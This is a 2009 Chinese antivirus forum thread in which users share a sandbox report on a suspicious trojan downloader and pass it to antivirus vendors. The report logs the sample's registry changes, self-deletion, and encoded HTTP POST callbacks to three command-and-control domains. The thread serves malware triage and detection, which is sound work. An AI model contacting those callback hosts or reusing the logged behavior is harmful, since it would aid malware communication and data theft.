收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 一个可疑样本~
返回列表 发新帖
查看: 4950|回复: 9
收起左侧

[病毒样本] 一个可疑样本~

[复制链接]
coldwinter
发表于 2009-9-9 15:09:02 | 显示全部楼层 |阅读模式
Size94208
MD53e00b4d7826f51e9d1a9b00d2fa6fd6e
SHA1ef65e4638b06591f8590b9dbdb2f40b0b63213ef
SHA256aae2a82d89a6493f4569ff4e6ea91e9f0946d4b73d45f6fe7c95556e619fd022
ProcessExited

Keys Created
LM\Software\Microsoft\RFC1156Agent2009.01.12 15:12:45.578
LM\Software\Microsoft\RFC1156Agent\CurrentVersion2009.01.12 15:12:45.578
LM\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters2009.01.12 15:12:45.578

• Keys Changed
• Keys Deleted
• Values Created
NameTypeSizeValue
LM\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecsREG_DWORD40x3a98


• Values Changed
NameTypeSizeValue
CU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettingsREG_BINARY/REG_BINARY52/56?/?

• Values Deleted • Directories Created • Directories Changed • Directories Deleted • Files Created • Files Changed
NameSizeLast Write TimeCreation TimeLast Access TimeAttr
C:\WINDOWS\system32\config\software8912896/89128962009.01.12 15:10:01.953/2009.01.12 15:12:45.5782008.07.31 16:55:51.593/2008.07.31 16:55:51.5932009.01.12 15:10:01.953/2009.01.12 15:10:01.9530x20/0x20

• Files Deleted
NameSizeLast Write TimeCreation TimeLast Access TimeAttr
C:\TEST\sample.exe942082009.01.12 15:12:41.3752009.01.12 15:12:20.5462009.01.12 15:12:20.5460x20

• Directories Hidden • Files Hidden • Drivers Loaded • Drivers Unloaded • Processes Created
PIdProcess NameImage Name
0x4e8cmd.exeC:\WINDOWS\system32\cmd.exe

• Processes Terminated • Threads Created
PIdProcess NameTIdStartStart MemWin32 StartWin32 Start Mem
0x2aclsass.exe0x7240x7c810856MEM_IMAGE0x77e76bf0MEM_IMAGE
0x348svchost.exe0xf80x7c810856MEM_IMAGE0x7c910760MEM_IMAGE
0x3f4svchost.exe0x2d00x7c810856MEM_IMAGE0x77e76bf0MEM_IMAGE
0x424svchost.exe0x4cc0x7c810856MEM_IMAGE0x77df9981MEM_IMAGE
0x4e8cmd.exe0x4ec0x7c810867MEM_IMAGE0x4ad05056MEM_IMAGE

• Modules Loaded • Windows Api Calls • DNS Queries
DNS Query Text
myart-gallery.com IN A +
yourkoarts.com IN A +
bestartcollection.com IN A +

• HTTP Queries
HTTP Query Text
myart-gallery.com POST /senm.php?data=v22MzjS0H4X1XjRmvVFHEeE2PuPsctM6PdFWTH11KB0CWwXTiUHUzGr1BVrHIQqMgMqV750Teg== HTTP/1.1
yourkoarts.com POST /senm.php?data=v22MzjS0H4X1XjRmvVFHEeE2PuPsctM6PdFWTH11KB0CWwXTiUHUzGr1BVrHIQqMgMqV750Teg== HTTP/1.1
bestartcollection.com POST /senm.php?data=v22MzjS0H4X1XjRmvVFHEeE2PuPsctM6PdFWTH11KB0CWwXTiUHUzGr1BVrHIQqMgMqV750Teg== HTTP/1.1

• Verdict
Auto Analysis Verdict
Suspicious++


• Description
Suspicious Actions Detected
Creates and executes scripts
Deletes self


• Mutexes Created or Opened
PIdImage NameAddressMutex Name
0x684C:\TEST\sample.exe0x76ee3a34RasPbFile
0x684C:\TEST\sample.exe0x771ba3ae_!MSFTHISTORY!_
0x684C:\TEST\sample.exe0x771bc21cWininetConnectionMutex
0x684C:\TEST\sample.exe0x771bc23dWininetProxyRegistryMutex
0x684C:\TEST\sample.exe0x771bc2ddWininetStartupMutex
0x684C:\TEST\sample.exe0x771d9710c:!documents and settings!user!cookies!
0x684C:\TEST\sample.exe0x771d9710c:!documents and settings!user!local settings!history!history.ie5!
0x684C:\TEST\sample.exe0x771d9710c:!documents and settings!user!local settings!temporary internet files!content.ie5!

• Events Created or Opened
PIdImage NameAddressEvent Name
0x684C:\TEST\sample.exe0x769c4ec2Global\userenv: User Profile setup event
0x684C:\TEST\sample.exe0x77a89422Global\crypt32LogoffEvent
0x684C:\TEST\sample.exe0x77de5f48Global\SvcctrlStartEvent_A3752DX


免杀virscan.org上所有的杀毒软件。

[ 本帖最后由 coldwinter 于 2009-9-9 15:10 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

kaap
发表于 2009-9-9 15:10:13 | 显示全部楼层

回复 1楼 coldwinter 的帖子

已上报瑞星
RS20090909150544890878
回复

举报

rok827
发表于 2009-9-9 15:11:28 | 显示全部楼层
ilenameResult
xx.exe UNDER ANALYSIS

The file 'xx.exe' has been determined to be 'UNDER ANALYSIS'

[ 本帖最后由 rok827 于 2009-9-9 15:12 编辑 ]
回复

举报

coldwinter
 楼主| 发表于 2009-9-9 15:15:16 | 显示全部楼层
thank you~~
回复

举报

The EQs
发表于 2009-9-9 15:17:10 | 显示全部楼层
又是加了一堆数据的UPX.。。。
放个脱了MJ的样本

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

rok827
发表于 2009-9-9 15:20:38 | 显示全部楼层

回复 5楼 The EQs 的帖子

to avira,thank you for your help
回复

举报

失落的手链
发表于 2009-9-9 17:22:46 | 显示全部楼层
瑞星2010
查询编号:RS20090909150544890878
文件名称:xx.rar
文件MD5:E61B3018396EAB966410310234EBAC65
文件状态:压缩文件,包含1个文件
文件名MD5状态病毒名称解决版本号
xx.exe3E00B4D78...安全文件
回复

举报

jason_jiang
发表于 2009-9-9 17:46:16 | 显示全部楼层

回复 5楼 The EQs 的帖子

D:\Backup\桌面\dumped_.exe - 已感染 Trojan.Siggen.3969
回复

举报

sam.to
发表于 2009-9-9 17:53:14 | 显示全部楼层
https://www.virustotal.com/anali ... e619fbcc-1252489980
to kl,ll,mcafee,comodo


Hello,


xx.ex%e - Trojan-Downloader.Win32.CodecPack.kct

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

[ 本帖最后由 sam.to 于 2009-9-9 18:03 编辑 ]
回复

举报

090168
发表于 2009-9-14 00:42:29 | 显示全部楼层

avg 报2个

"D:\垃圾下载专区\360\xx.rar";"特洛伊木马 Downloader.Generic8.BPGF";"已感染"
"D:\垃圾下载专区\360\xx.rar:\xx.exe";"特洛伊木马 Downloader.Generic8.BPGF";"已感染"
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-4-20 11:34 , Processed in 0.097147 second(s), 4 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表